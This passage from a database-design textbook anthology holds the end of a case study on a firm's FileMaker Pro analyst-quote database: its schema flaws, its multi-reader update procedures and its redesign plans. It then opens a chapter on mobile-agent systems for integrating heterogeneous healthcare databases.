• Analysts and offices were assigned unique numerical sequential keys by FM Pro.
• Firm names were used as primary keys to firm records on the assumption that a firm would not choose a name already used by another. This is a dangerous assumption in theory (Connolly & Begg, 2005, p. 451; Hernandez, 2003, pp. 262-263; Riordan, 2005, p. 34, as well as many other places), but was considered safe as a practical matter, and held up in practice. Its biggest problem came from violating Hernandez's final requirement ("its value can be modified only in rare or extreme cases") because firms change their names, if not frequently, at least more than rarely. (This is not a formal requirement of database theory, but is an important practical guideline.) The choice of firm name as a primary key required someone to update the records of all analysts at a firm when a firm changed its name, since it is a foreign key in those records.
• Quote records did not have a key. It was felt that quotes would be accessed only through searches on their contents, so a key would not be needed. While this assumption also held up in practice, the decision not to have a key for quote records had implications for database normalization that will be discussed later.
These tables had the following columns (data fields). Many of the informational items about analysts, firms, and offices are optional.
• Quote: Analyst ID no. (foreign key), publication, date of issue, cover date, page number, author, summary of article, content of quote, vendor(s) mentioned, attitude of quote toward each vendor mentioned, initials of person entering quote, date quote was entered. Having both "date of issue" and "cover date" may seem redundant. "Date of issue" was a calendar date of type Date to facilitate searching and sorting. (One often wants to know what analysts said during specific time periods, such as before and after an announcement.) Some publications do not have a calendar date as their date of issue; for example, a monthly might have an issue dated July 2005. This is not a valid Date data type, but someone seeking an article in a library needs this information. The "cover date" field held it as a text string. It was left empty if the date of issue was a single calendar date, as is true of dailies and most weeklies. When it was not, the first date of the period in question was used for "Date of issue": the July 2005 issue in this example would have been assigned July 1, 2005 as its "date of issue."
• Analyst: ID no. (key), family name, given name, middle name, courtesy title (Mr./Ms./etc.), job title, firm name (foreign key), office ID (foreign key), professional specialization, service or other division of the firm, previous employers, telephone numbers (direct, fax, home, mobile), e-mail address, list of vendors covered, other notes.
• Office: ID no. (key), firm name (foreign key), address (first line, second line, city, state/province/etc., postal code, country), main telephone number, main fax number.
• Firm: name (key), category (industry analysis, financial analysis, other, unknown), names of key people, capsule description, client base, major services, size, home page URL, usual e-mail address format, office ID of headquarters6 (foreign key).
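A minimal relational sketch of this structure makes the keys and foreign keys explicit. It is our own illustration in SQL via Python's sqlite3, not the FileMaker Pro definition; column lists are abbreviated and the names are assumptions.

```python
# Sketch of the four tables as described above (abbreviated columns).
# The flattened "vendors mentioned" field and the keyless Quote table are
# reproduced deliberately, since those design choices are discussed next.
import sqlite3

db = sqlite3.connect(":memory:")
db.executescript("""
CREATE TABLE firm (
    name          TEXT PRIMARY KEY,   -- firm name used as the key
    category      TEXT,
    home_page_url TEXT
);
CREATE TABLE office (
    office_id INTEGER PRIMARY KEY,    -- sequential key assigned by FM Pro
    firm_name TEXT REFERENCES firm(name),
    city      TEXT,
    country   TEXT
);
CREATE TABLE analyst (
    analyst_id  INTEGER PRIMARY KEY,  -- sequential key assigned by FM Pro
    family_name TEXT,
    given_name  TEXT,
    firm_name   TEXT REFERENCES firm(name),
    office_id   INTEGER REFERENCES office(office_id)
);
CREATE TABLE quote (                  -- note: no primary key of its own
    analyst_id        INTEGER REFERENCES analyst(analyst_id),
    publication       TEXT,
    date_of_issue     DATE,
    cover_date        TEXT,
    content           TEXT,
    vendors_mentioned TEXT            -- repeating field held in one column
);
""")
```

The paragraphs that follow explain why the keyless Quote table and the repeating vendor field cause normalization problems.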
From a theoretical database design perspective, this design has several flaws. For one thing, it violates normalization (Codd, 1990) in (at least) two ways. First normal form (1NF) is violated because the vendors mentioned in each quote were listed in a repeating field within the Quote record, not in a separate table. This was done as a practical implementation matter. It was considered unlikely that any quote would ever mention more than 10 vendors. The wasted space of leaving room for 10, even if none were mentioned, was negligible.
However, the decision not to have a key to quote records also played a part here. Absent such a key, it was impossible to set up a separate table for vendor mentions, and link each mention to its associated quote. The Quote table is also not in second normal form (2NF) because there can be several quotes in one article. The bibliographic data of the article, combined with the analyst’s ID no., is a candidate key for the quote record. (A unique numeric key might be better, but it will do.) Information such as the name of the article’s author and the content summary of the article depend only on part of this candidate key: the bibliographic data. It is repeated in the record of each quote appearing in an article. It was not necessary for the person entering data to retype it—an FM Pro script copied all the article-related information from the first quote into all subsequent quote records for the same article—but the redundant data remained in the database, and it was theoretically possible to modify it in one quote record but not the others, creating what is known as an update anomaly. A better database design would use a separate table for articles, and would include the key of that table as a foreign key in each Quote record. These deficiencies were the result of not following a systematic database design approach. When database design begins with an ERD and develops tables from it, normalization violations such as this tend not to occur (Connolly & Berg, 2005, p. 399; Hoffer, Prescott, & McFadden, 2002, p. 192ff; as well as many other places), though “the E-R approach alone does not guarantee good relational design” (Kifer, Bernstein, & Lewis, 2005, p. 87). A better ERD on which to base the database would therefore have been as illustrated in Figure 4. Despite these design deficiencies, the database system worked well enough for one person to enter data. As the content of the database grew, Balmoral Group was able to sell it to clients. There was no strategy for doing so, but the attraction of
Figure 4. The better ERD (entities: Vendor Mention, Quote, Article, Analyst, Office, Firm)
additional revenue was strong, and this had always been part of the concept. The clients who paid for its use soon wanted more complete coverage than the initial, somewhat random data-collection methods could provide; those methods depended on Balmoral employees encountering quotes in their professional reading and sending them to Ackerman. As interest in the information grew, it became necessary to hire additional people to obtain more complete coverage of the ICT trade press.
Balmoral did not then have a database server and did not want to invest in one, due to the cost and complexity of moving from a single-user to a multiuser database. The issues were not only hardware and software, but the need to add a "real" IS capability to an organization that had managed to do quite well until that point without one. It was felt, perhaps wrongly in retrospect, that it was worth making some technical sacrifices in order to continue in this informal mode of operation, and to avoid either having to hire an IS specialist or outsourcing this aspect of the firm's work. Instead, procedures were adopted to handle the necessary coordination, with a staff member assigned (in addition to her other duties) to coordinate it. The number of people entering data eventually grew to 10 on a regular basis, with a few others augmenting their efforts at peak times. Having this many people enter data required a complex operational procedure, as follows:
1. Each "reader" (person reading articles and entering quote data from them) received a fresh copy of the database each month, containing the most recent version of the Analyst, Firm, and Office tables (see Endnote 7). This version included all the updates, such as new analysts or firms, entered by other readers during the previous month.
2. The database coordinator, Sandi Carpenter, would assign each reader a range of keys for analyst and office IDs. The reader would reset the number at which FM Pro begins its sequence of keys to the first number in this range. Thus, analyst records created by different readers would all have unique keys. When a reader exhausted this range, the database coordinator would give him or her a new range to work with. The database coordinator, in turn, kept track of the key range assigned to each reader.
3. Each reader would work independently, using hard-copy publications assigned to him or her and articles that Tamara Hudson downloaded from online sources, such as LexisNexis, and distributed to readers.
4. Periodically, the readers would send files to Carpenter. Specifically, they would send seven files:
• New quotes
• New analysts
• Modified analysts (firm changes, title changes, finding information not previously known, etc.)
• New firms
• Modified firms
• New offices
• Modified offices
The first of these files was the reader's entire Quotes file, since each reader started each time period with an empty Quotes file. The others were extracted from the complete Analysts, Firms, and Offices files. New entities were extracted based on record-creation date being within the current time period. Modified entities were extracted based on record-creation date being before the current time period, but record-modification date being within it. FileMaker Pro maintains both these dates automatically, though it is up to the database designer to make them user-visible.
5. Carpenter would then check for duplicate data entered by more than one reader. This arose in part because new firms and analysts often showed up in multiple quotes at about the same time. If the first two times John Jones of Jones Associates was quoted occurred in the same week, two readers might find him and create records for him at about the same time. In addition, two or more online search strings would occasionally return the same article. The nature of online information retrieval, and the limits of LexisNexis on the complexity of a single search string, required multiple searches in order to retrieve all the articles of interest. It was not practical to read all the articles these searches retrieved in advance to eliminate duplicates before assigning the retrieved articles to readers. Carpenter would also check updates for consistency and overlap. For example, one reader might find, via a citation, that an analyst was promoted from Research Director to Vice President. Another might find that she moved from Massachusetts to California. Her record in the master copy of the Analysts table must be updated to reflect both these changes. FM Pro has a command to find all duplicated values in a given field, so identifying potential duplicates is not difficult. However, the word "potential" is important. Human names are not unique. With 2,000+ high-tech industry analysts, identical names occur from time to time. Carpenter had to check other information to determine if two records having the same analyst name represent the same person or different ones. When duplicate records were found, one was deleted. In addition, if the duplicate was of an analyst or a firm, it was necessary to take all the records that had been linked to the deleted record and relink them to the one retained. For example, suppose one reader who has analyst keys starting with 7000 and another who has keys starting with 8000 both found John Jones, who was not previously in the database. Carpenter would get two John Jones records, one with a key of (say) 7012 and the other with (say) 8007. Suppose she determined that they represent the same person. If record 8007 was deleted, all quotes having 8007 in their foreign-key Analyst ID field had to have it changed to 7012. This is not conceptually difficult, but can be time-consuming.
6. Carpenter also had to check for multiple records referring to the same person in different ways. People use different forms of their names: Robert Enderle is often called "Rob"; some reporters who do not know him well also assume the more common "Bob." They change names, with Traci Bair becoming Traci Gere and sometimes cited as Traci Bair Gere. Reporters misspell names, with Dan Kusnetzky cited as Dan Kuznetsky or any of several other variations. Family and given names, especially but not only Asian, may appear in either order: Sun Chung in one article could be Chung Sun in another. (These are all real examples.) Some of these variations result from reporter errors, not database design or business process deficiencies, but they must be dealt with no matter what their cause is. The database, which looks up analysts by family name, will report no match in all these cases except the first, causing the reader to create a new entry for an analyst who is
actually already in the database. Individual readers cannot be expected to keep up with every analyst in the database (over 8,000 by 2003; see Endnote 8) in order to prevent confusion. All these names must be made uniform, with extra analyst records removed and their quotes relinked to the correct analyst record, before the database can be analyzed for reports or made available to clients.
7. At least monthly, and more often if the number of changes or additions warranted, Carpenter sent updated versions of the Analysts, Firms, and Offices tables to the readers.
8. After all quotes for a given month were entered, she sent the complete tables to Balmoral Group research analysts to write client reports and upload the database to Balmoral Group's Web site.
These procedures worked because Balmoral Group clients saw only monthly updates to the database. This kept the internal updating and quality-control processes from their eyes, and prevented them from becoming a client-satisfaction issue. The database was visible to clients in two ways:
• Online, to download to their own computers as a freestanding application that does not require the user to have FileMaker Pro installed. (A license for the FileMaker Pro Developer package allows royalty-free distribution of such applications. A person using an application it creates can modify database contents, but can be prevented from changing database structure, screens, predefined queries, reports, etc.)
• Through reports, written each month by Balmoral Group analysts and sent to clients. These reports analyzed the quotes about the client and its chief competitors during the previous month, including the subjects accounting for the lion's share of analyst attention and trends in analyst attitudes toward the client and its competitors.
Clients were given a report on one month's quotes by the 15th of the following month. This allowed time for these four steps:
a. quotes published at the end of one month to become available at online information retrieval services about 3 or 4 days into the following calendar month;
b. those quotes to be entered by the readers;
c. the database updates to be merged and the database cleaned up; and
d. the data to be analyzed and the reports themselves written.
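The merge-and-relink work described in items 5 and 6 is mechanical enough that a short sketch may make it concrete. The following Python fragment is only an illustration of the bookkeeping involved; the record structures, function name, and key values are assumptions, not the FM Pro scripts Balmoral actually used.

# Illustrative sketch of merging a duplicate analyst record and repointing quotes.
def merge_duplicate_analysts(analysts, quotes, keep_id, drop_id):
    """Delete the duplicate analyst record and relink its quotes to the retained one."""
    for quote in quotes:
        if quote["analyst_id"] == drop_id:      # e.g., 8007 -> 7012
            quote["analyst_id"] = keep_id
    return [a for a in analysts if a["id"] != drop_id], quotes

analysts = [{"id": 7012, "name": "John Jones"}, {"id": 8007, "name": "John Jones"}]
quotes = [{"text": "...", "analyst_id": 8007}, {"text": "...", "analyst_id": 7012}]
analysts, quotes = merge_duplicate_analysts(analysts, quotes, keep_id=7012, drop_id=8007)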
The start of a typical report, edited to remove actual company names, is shown in Figure 5. A typical report would be 8 to 10 pages long. About half of this content summarized overall industry analyst quotation activity for the previous month, and was generic to all client reports. The other half was specific to each client, though some parts of the analysis could often be reused when two clients were in the same industry segment; in this situation, one report client would often also be in other clients' "key competitor" lists.
Figure 5. The start of a typical report (actual company names removed)
By this time the database had several user clients, and was responsible for about a third of Balmoral Group's revenue. Feedback from clients and internal users (the latter using it primarily in the context of report writing) highlighted several areas of potential improvement. Ackerman, who continued to be the sole database developer throughout the period covered by this case, implemented them, again without benefit of a formal development process.
The second major version of the database was released to customers in October 2001. It improved the appearance of most user-visible screens. Functionally, this version of the system provided users with easy-to-use standard queries. While FileMaker Pro's "Find" facility is not difficult to master (it is far easier than, for example, SQL's SELECT), it can intimidate those whose computer literacy consists of word processing and e-mail. By this time Balmoral had gained sufficient experience answering client inquiries, as well as using the database for writing reports and its other internal needs, to know what most queries would be. These common queries were supported by forms that showed only the data fields needed
for the query at hand, backed up by custom scripts (FM Pro's term for programs in its proprietary language) as needed, and made available through buttons on a main menu page. For example, a client who wanted to know how favorable analysts' comments about a particular firm had been during the past month needed only to click on "Show Quotations Mentioning a Vendor," select the vendor name from a dynamic pull-down list, and enter the starting and ending dates of that month. The query screen looked like Figure 6. The result would list all the matching quotes and provide a count of those that were positive, neutral, or negative, with a summary score from 0 to 2 reflecting their distribution among these three groups. (Zero meant all negative quotes, 2 was
the positive limit.) By clicking on the summary line of a quote in the list, the user could see all the available information about that quote. The top of a results page could look like Figure 7. The result, according to users, was a major improvement in ease of use. The underlying data model, however, did not change.
Figure 6. The query screen
Figure 7. The top of a results page
Another change made at this time was to enlarge the repeating field for vendor mentions from 10 vendors mentioned in a quote to 12. The assumption made early on, that "it was considered unlikely that any quote would ever mention more than ten vendors," turned out to be wrong. Reporters often quote reports from "market watcher" firms such as International Data Corporation (IDC) that list the top vendors in various markets. While these vendor lists are usually shorter than 10, there is no absolute upper limit. Twelve took care of just about every case, but not all. As a practical matter, it was felt that the inaccuracies resulting from omitting vendors after that point were negligible, since important vendors tended to be among the first few mentioned. Still, this is an area where poor database design had user-visible repercussions.
Finally, Ackerman also wrote a full user's manual at this point. This was initially about 20 pages long, growing to 35 as the system (and Balmoral's understanding of what tended to confuse users) evolved. It reduced the number of support calls for the system, and was a selling point for new clients.
An enhancement to this release in May 2002 added a new table for publications. This table was added to allow categorization of publications by region (North America, Europe, Asia/Pacific, Rest of World) and coverage (IT, general business, specialized business, general/other). This was done in response to customer requests to be able to track coverage by these criteria. This table used the
name of the publication as its key. That, in turn, led to difficulties later, since many general-interest publications have traditional names such as Times, Journal, Courier, and so on. It was necessary to add location information to their "titles" in order to make the keys unique and tell the publications apart: Times (London), Times (Seattle), and so on. It also required readers to know the correct form of a publication name to check the database: is it "Times (New York)," "New York Times," or "The New York Times"? Guidelines were developed to deal with this problem, but guidelines can never foresee every possible situation, and humans never read guidelines perfectly in every case. The logical database design at this point looked like this, with one publication potentially having many quotes, but each quote appearing in a single publication (see Figure 8).
Figure 8. The logical database design at this point (entities: Quote, Publication, Analyst, Office, Firm)
Version 3 of the database was released to clients in November 2002. The major change here was in the forms and queries for accessing analyst information. These were totally redone to resemble those used to access quote information. The underlying data tables, however, did not change.
In February 2003, a new table was added to Version 3. It did not affect the essential functions of the database, but was introduced to deal with an operational issue. Clients used the notes column of the analyst table to record information about their interactions with the analyst: things they have learned about him or her, and other items that may be of future use in planning how they will work with that person. However, when clients get an updated copy of the database each month, it includes a new analyst table that does not have these notes. Adding them to the main Balmoral Group database is not a viable option, since it would make one client's notes about a particular analyst visible to all other clients, as well as creating problems when more than one client had notes on a given analyst. Merging a client's existing notes with the newly updated Analyst table, when it is downloaded each month, is possible, but is more technical work than many database end users are ready for. By adding a separate table to contain these notes, the table can be left in place when the new version of the database is downloaded. The new table contains two columns: the note and the analyst ID as a foreign key. It has no key of its own since it is only accessed as an adjunct to the Analyst table. Conceptually, database design principles allow two tables in a one-to-one relationship to be combined with each other, but in this case, the need for separate operational treatment of different data elements led to splitting it (see Figure 9).
Figure 9. The design with the separate Notes table (entities: Quote, Publication, Analyst, Notes, Office, Firm)
At this time, providing quotation tracking and analysis services was a major line of business for Balmoral Group. It kept eight readers busy, some full time and some part time. It also supported the database coordinator, about three-quarters of the project manager's time, and about a quarter of the time of three other professionals (most of it during a 1-week period of intensive report-writing
activity each month). Clients found the service to provide valuable information and to be cost-effective, as the major expense items were spread over multiple clients. In terms of cost, eight readers were about $15,000 per month, with the other professionals adding about the same amount, for a total of about $360,000 per year. Income was slightly more than this. There was a great deal of leverage in the system, in the sense that over 60 percent of the expenses (the readers, database coordinator, and project manager) were fixed in the short run. Revenue from additional clients, other than the additional analyst time required to write their monthly reports, was largely profit. Conversely, the loss of a client would be felt severely. In addition, Balmoral Group management felt that the system was a major factor in selling its other products and services.
CURRENT CHALLENGES / PROBLEMS FACING THE ORGANIZATION
By the first quarter of 2003, it was generally recognized at Balmoral Group that:
• Clients wanted online access to the database. Downloading it once a month was not an acceptable option. There was concern that lack of online access would lead to clients dropping the service.
• Waiting as long as 6 weeks for a quote to appear in the database was also not acceptable. (The maximum delay occurred when a quote from the beginning of one month was not available until the database update in the middle of the following month. For example, a quote published on June 2, presumably reflecting an analyst's feelings in late May, would not be available until July 15.) It was hoped that putting the database online would make it possible to shorten this lag by having individual quotes available soon after they were entered. This lag was also a potential client-loss issue.
• The operational complexity of coordinating the readers' database updates was a burden. A shared database would reduce it. Consider the earlier example of two readers finding John Jones at different times in the same month. With a shared database, the first reader to encounter him would enter him into the database. The next reader to enter a quote by Jones, whether a minute or a week later, would find him in the database and would therefore not create a new record.
• The deficiencies of the original database design, which had not been changed even though the user interface had been modernized, were beginning to show in data-quality issues as the database expanded. This was not yet a client-loss issue, but the analysts preparing monthly reports found themselves spending what they considered an excessive amount of time resolving quality issues, and working considerable overtime to get reports out on schedule despite this.
These requirements were the subject of a great deal of discussion among Oliviera, Ackerman, and senior staff members of the firm. Two changes in the business environment influenced the decision. One was Ackerman’s planned departure, which has already been mentioned, and which left Oliviera as the sole owner and decision-maker. The other was the expected purchase of Balmoral Group by a marketing firm with multiple synergistic subsidiaries. This was expected to provide both financial and technical resources with which to develop a “real” IT infrastructure and take this system to the next level. Oliviera decided to initiate two parallel development projects. One was to take the existing FileMaker Pro database and put it online on a server. This was to be a short project intended as an intermediate step. This database would
retain all the good and bad points of the FM Pro system, including its data model. The other project was to develop a new SQL-based system with a totally redesigned, properly normalized database. Its user interface would be different, since it would use different software, but it would offer at least the same functionality as the mid-2003 version of the system. Both development projects would be outsourced to IS professionals in the acquiring firm. With this in mind, the FM Pro application was frozen in May 2003 except for bug fixes and mandatory changes.
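To make the "properly normalized" goal concrete, the following is a minimal sketch of what such a redesigned schema might look like, expressed as SQLite DDL driven from Python. The table and column names are illustrative assumptions only; the case does not specify the schema the outsourced team actually produced.

# Hypothetical normalized schema; names are assumptions, not the real Balmoral design.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE Publication (
    pub_id    INTEGER PRIMARY KEY,   -- surrogate key instead of the publication name
    name      TEXT NOT NULL,
    region    TEXT,                  -- North America, Europe, Asia/Pacific, Rest of World
    coverage  TEXT                   -- IT, general business, specialized business, general/other
);
CREATE TABLE Article (
    article_id INTEGER PRIMARY KEY,
    pub_id     INTEGER REFERENCES Publication(pub_id),
    author     TEXT,
    summary    TEXT                  -- stored once per article, not once per quote
);
CREATE TABLE Analyst (
    analyst_id  INTEGER PRIMARY KEY,
    family_name TEXT,
    given_name  TEXT
);
CREATE TABLE Quote (
    quote_id   INTEGER PRIMARY KEY,  -- the key the original design lacked
    article_id INTEGER REFERENCES Article(article_id),
    analyst_id INTEGER REFERENCES Analyst(analyst_id),
    tone       TEXT                  -- positive / neutral / negative
);
CREATE TABLE VendorMention (         -- replaces the repeating field of 10-12 vendors
    quote_id INTEGER REFERENCES Quote(quote_id),
    vendor   TEXT,
    PRIMARY KEY (quote_id, vendor)
);
""")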
REFERENCES
Alcatel. (2005). Analysts' corner. Retrieved February 6, 2005, from http://www.alcatel.com/industry_analysts/index.jhtml
Codd, E. F. (1990). The relational model for database management: Version 2. Reading, MA: Addison-Wesley.
Coffey, G. (2005). FileMaker Pro 7: The missing manual. Sebastopol, CA: O'Reilly.
Columbus, L. (2004). Getting results from your analyst relations strategy. Lincoln, NE: iUniverse.
Computer Associates. (2005). Industry analysts. Retrieved February 6, 2005, from http://www3.ca.com/analyst
Connolly, T., & Begg, C. (2005). Database systems: A practical approach to design, implementation and management (4th ed.). Reading, MA: Addison-Wesley.
FileMaker. (2005). FileMaker Pro 7. Retrieved February 6, 2005, from http://www.filemaker.com/products/fm_home.html
Forrester Research. (2005). Corporate fact sheet. Retrieved February 6, 2005, from http://www.forrester.com/FactSheet
Gartner Group. (2005). Investor relations. Retrieved February 6, 2005, from http://investor.gartner.com
Hernandez, M. J. (2003). Database design for mere mortals (2nd ed.). Reading, MA: Addison-Wesley.
Hewlett-Packard. (2005). Industry analyst relations. Retrieved February 6, 2005, from http://www.hp.com/hpinfo/analystrelations
Hoffer, J. A., Prescott, M. B., & McFadden, F. R. (2002). Modern database management (6th ed.). Upper Saddle River, NJ: Prentice Hall.
Insight Marketing. (2005). Industry analyst relations. Retrieved February 6, 2005, from http://www.insightmkt.com/services/analyst_relations.asp
International Data Corporation. (2005). Browse analysts. Retrieved February 6, 2005, from http://www.idc.com/analysts/analysthome.jsp
Kensington Group. (2004). Portal to the world of industry analysts. Retrieved February 6, 2005, from http://www.kensingtongroup.com/Links/companies.html (As of September 2005, access to this site is restricted. However, a similar list is publicly available at http://www.tekrati.com; click on "Firms Directory" on the left side of its home page.)
Kifer, M., Bernstein, A., & Lewis, P. M. (2005). Database systems: An application-oriented approach (4th ed.). Reading, MA: Addison-Wesley.
Riordan, R. M. (2005). Designing effective database systems. Reading, MA: Addison-Wesley.
Schwartz, S. A., & Cohen, D. R. (2004). The FileMaker Pro 7 bible. Hoboken, NJ: John Wiley & Sons.
Sybase. (2005). Industry analyst. Retrieved February 6, 2005, from http://www.sybase.com/pressanalyst/industryanalyst
Tekrati. (2005). The industry analyst reporter. Retrieved February 6, 2005, from http://www.tekrati.com
ENDNOTES
1. Since this case does not mention any other type of analyst, industry analysts will be referred to as just "analysts."
2. The firm name and all individual names are fictional. No similarity to any real person is intended.
3. Product names, which may be trademarks or registered trademarks of those products' suppliers, are used in this paper for identification purposes only.
4. This topic is covered in every introductory MIS textbook, typically in its last half in a chapter with a title such as "System Development Methods," and in more depth in every systems analysis textbook. Rather than provide specific references, which would create an excessively long list while inevitably omitting many widely used texts, we refer the reader to any book of this type that he or she happens to have or is familiar with.
5. See previous endnote.
6. The headquarters relationship between firms and offices is not shown in the ERD since it is of little practical use.
7. In FileMaker Pro 5 (the version used in this case) and 6, each table is a separate file as seen by the OS. The database is the set of such files, just as it is the set of tables in database theory. FileMaker Pro 7 and 8 (the current release) allow, but do not require, multiple tables to share a single file. This is closer to the Access approach that some readers may be familiar with, where tables share one OS-visible file. In Access, it would have been more difficult to send some tables but not others to readers. In FM Pro 7 or 8 it would have been simpler: the tables the readers get each month, and only those tables, could have been put into one file.
8. There are three reasons why this figure is so much higher than the figure of 2,000+ given for the industry overall. One is that the estimate of 2,000+ is deliberately conservative. A second is turnover: while there may be 2,000 industry analysts at any one time, there were more than that over a 3-year period. A third is that the database also included quotes from people who would be more accurately described as financial analysts or some other related category.
This work was previously published in Journal of Cases on Information Technology, Vol. 8, Issue 3, edited by M. Khosrow-Pour, pp. 24-40, copyright 2006 by IGI Publishing (an imprint of IGI Global).
Chapter 2.5
Integrating Mobile-Based Systems with Healthcare Databases
Yu Jiao, Oak Ridge National Laboratory, USA
Ali R. Hurson, Pennsylvania State University, USA
Thomas E. Potok, Oak Ridge National Laboratory, USA
Barbara G. Beckerman, Oak Ridge National Laboratory, USA
ABSTRACT
In this chapter, we discuss issues related to e-health and focus on two major challenges in distributed healthcare database management: database heterogeneity and user mobility. We designed and prototyped a mobile-agent-based mobile data-access system framework that can address these challenges. It applies a thesaurus-based hierarchical database federation to cope with database heterogeneity and utilizes the mobile-agent technology to respond to the complications introduced by user mobility and wireless networks. The functions provided by this system are described in detail and a performance evaluation is also provided.
INTRODUCTION
The integration of healthcare management and advances in computer science, especially those in the areas of information-system research, has begotten a new branch of science: e-health. E-health is becoming more and more widely recognized as an essential part for the future of both healthcare management and the health of our children. The 2001 President’s Information Technology Advisory Committee, in its report “Transforming Healthcare through Information Technology,” noted that information technology “offers the potential to expand access to healthcare significantly, to improve its quality, to reduce its costs, and to transform the conduct of biomedical
research”(p. 1). Although much has been done, reality has proven to us that there are still a great number of problems remaining to be taken care of. Health and human-services secretary Mike Leavitt told the Associated Press (2005) in an interview after hurricane Katrina, “There may not have been an experience that demonstrates, for me or the country, more powerfully the need for electronic health records…than Katrina” (p. 1). The article also pointed out that the “federal government’s goal is to give most Americans computerized medical records within 10 years”(p. 1). E-health embraces a broad range of topics, such as telemedicine, medical-record databases, health information systems, genomics, biotechnology, drug-treatment technologies, decision-support systems, and diagnosis aids, just to name a few. In this chapter, we focus on the topic of technologies that deal with integrating mobile-based systems with healthcare databases. One of the major challenges in healthcare database integration is the fact that the lack of guidance from central authorities has, in many instances, led to incompatible healthcare database systems. Such circumstances have caused problems to arise in the smooth processing of patients between health service units, even within the same health authority (Svensson, 2002). For instance, electronic health record (EHR) systems have been used in practice for many years. However, they are often designed and deployed by different vendors and, thus, patients’ information is collected and stored in disparate databases. Due to the lack of uniformity, these systems have very poor interoperability. Even though the wide deployment of networks has enabled us to connect these databases, a large amount of work still needs to be handled manually in order to exchange information between the databases.F There are two potential solutions to the problems of interoperability and automated information processing: redesigning and reimplementing the existing databases or using a database federation. Redesigning and reimplementing existing
databases require large capital investments, and are difficult to achieve. An alternative solution is to build a database federation in which problems caused by database heterogeneity are remedied by the use of a mediator: metadata. This approach is often referred to as the multidatabase solution (Bright, Hurson, & Pakzad, 1994). The Internet and the client-server-based computing paradigm have enabled us to access distributed information remotely, where the data servers act primarily as an information repository, the user’s workstation bears the brunt of the processing responsibility, and the client and server communicate through a well-formulated network infrastructure. Recently, the surge of portable devices and the wide deployment of wireless networks have ushered a new era of mobile computing. Users access information via wireless media and from lightweight and less powerful portable devices. This paradigm shift permits the exchange of information in real time without barriers of physical locations. This is particularly helpful in situations where emergency medical teams need to access patients’ information as soon as possible at a disaster site (Potok, Phillips, Pollock, & Loebl, 2003). However, mobile computing has also brought upon several technical challenges. First, unlike workstations, portable devices usually have limited CPU (central processing unit) processing capability and limited battery capacity. Second, low bandwidth and intermittent wireless network connections are often debilitating to client-server applications that depend on reliable network communications. The mobile-agent-based distributed system design paradigm can address the aforementioned limitations. Unlike the client-server-based computational model, which moves data to computation, mobile agents move computation to data. This allows mobile users to take advantage of the more powerful servers on the wired networks. In addition, mobile agents are intelligent and independent entities that posses decision-making capabilities. Once dispatched, they are able to
fulfill tasks without the intervention of the agent owner. Network connectivity is only required at the time of an agent’s submission and retraction. Therefore, the use of mobile agents alleviates constraints such as connectivity, bandwidth, energy, and so forth. We proposed and developed a prototype of a novel mobile-agent-based mobile data-access system (MAMDAS) for heterogeneous healthcare database integration and information retrieval (Jiao & Hurson, 2004). The system adopts the summary-schemas model (SSM; Bright et al., 1994) as its underlying multidatabase organization model. Queries are carried out by mobile agents on behalf of users. Via a medical thesaurus, created by combining the Medical Subject Headings (MeSH) thesaurus (Chevy, 2000) and an Englishlanguage thesaurus WordNet (Miller, Beckwith, Fellbaum, Gross, & Miller, 1990), MAMDAS supports imprecise queries and provides functions for user education. The purpose of this chapter is to provide details about the tools we developed for disparate healthcare database management and their potential applications. The rest of the chapter is organized as follows. First it provides the background, and then presents the design, functions, application, and performance evaluation of MAMDAS and a medical thesaurus MEDTHES. Finally, we summarize this chapter and discuss future trends.
BACKGROUND
In this section, we provide an overview of the current solutions to healthcare database management and introduce the two technologies on which we built our system: SSM and mobile-agent technology.
Healthcare Database Systems
The Veterans Health Administration (VHA) clinical information system began in 1982 as
the Decentralized Hospital Computer Program (DHCP) and is now known as VistA (Veterans Health Information Systems and Technology Architecture; Hynes, Perrin, Rappaport, Stevens, & Demakis, 2004). VistA has evolved into a very rich healthcare information system that provides the information-technology framework for VHA’s approximately 1,300 sites of care. VistA is built on a client-server architecture that ties together workstations and personal computers with nationally mandated and locally adapted software access methods. More specifically, VistA comprises more than 100 applications that clinicians access via the Computerized Patient Record System (CPRS) GUI (graphical user interface) to pull all the clinical information together from the underlying facility-based programming environment. CPRS provides a single interface for healthcare providers to review and update a patient’s medical record. More than 100,000 VHA healthcare providers nationwide currently use CPRS. One important reason for VistA’s success is the existence of a central authority. All VHA facilities are mandated to apply the same database-management system and unified access methods, which significantly eases the problem of interoperability among systems at different sites. Unfortunately, this uniformity is not a norm in today’s healthcare databases. More often, we have to deal with heterogeneous databases that are designed and developed by different vendors. IBM’s DiscoverLink targets applications from the life-sciences industry (Hass et al., 2001). It is a fusion of two major components: Garlic (Carey et al., 1995) and DataJoiner (Cahmberlin, 1998). Garlic is a federated database-management system prototype developed by IBM Research to integrate heterogeneous data. DataJoiner is an IBM federated database-management product for relational data sources based on DATABASE 2 (Cahmberlin). It is a mediator system that limits itself to metadata exchange and leaves the data in their original databases and format. When an application submits a query to the DiscoveryLink
Integrating Mobile-Based Systems with Healthcare Databases
server, the server identifies the relevant data sources and develops a query execution plan for obtaining the requested data. The server communicates with a data source by means of a wrapper, a software module tailored to a particular family of data sources. The wrapper is responsible for mapping the information stored by the data source into DiscoveryLink’s relational data model, informing the server about the data source’s query-processing capability, mapping the query fragments submitted to the wrapper into requests that can be processed using the native query language of the data source, and issuing query requests and returning results. Since data sources may take one of the many formats—relational database, object-oriented database, or flat files such as XML (extensible markup language) files and text files—a wrapper is needed for each format. Thus, wrapper development is the key to the extensibility in DiscoveryLink. The TAMBIS (Transparent Access to Multiple Bioinformatics Information Sources) project (Stevens et al., 2000), as its name suggests, aims to provide transparent access to disparate biological databases. TAMBIS includes a knowledge base of biological terminology (the biological concept model), a model of the underlying data sources (the source model), and a knowledge-driven user interface. The concept model provides the user with the concepts necessary to construct multiplesource queries, and the source model provides a description of the underlying sources and mappings between the terms used in the sources and the terms defined in the concept model. In other words, TAMBIS utilizes a domain-specific ontology for heterogeneous data-source integration. It is a novel and valid approach. However, the depth and quality of the TAMBIS ontology are difficult to evaluate because the ontology contents are not publicly available. The PQL query language proposed by Mork, Shaker, Halevy, and Tarczy-Homoch (2002) intends to integrate genetic data distributed across the Internet. It is essentially a query language for
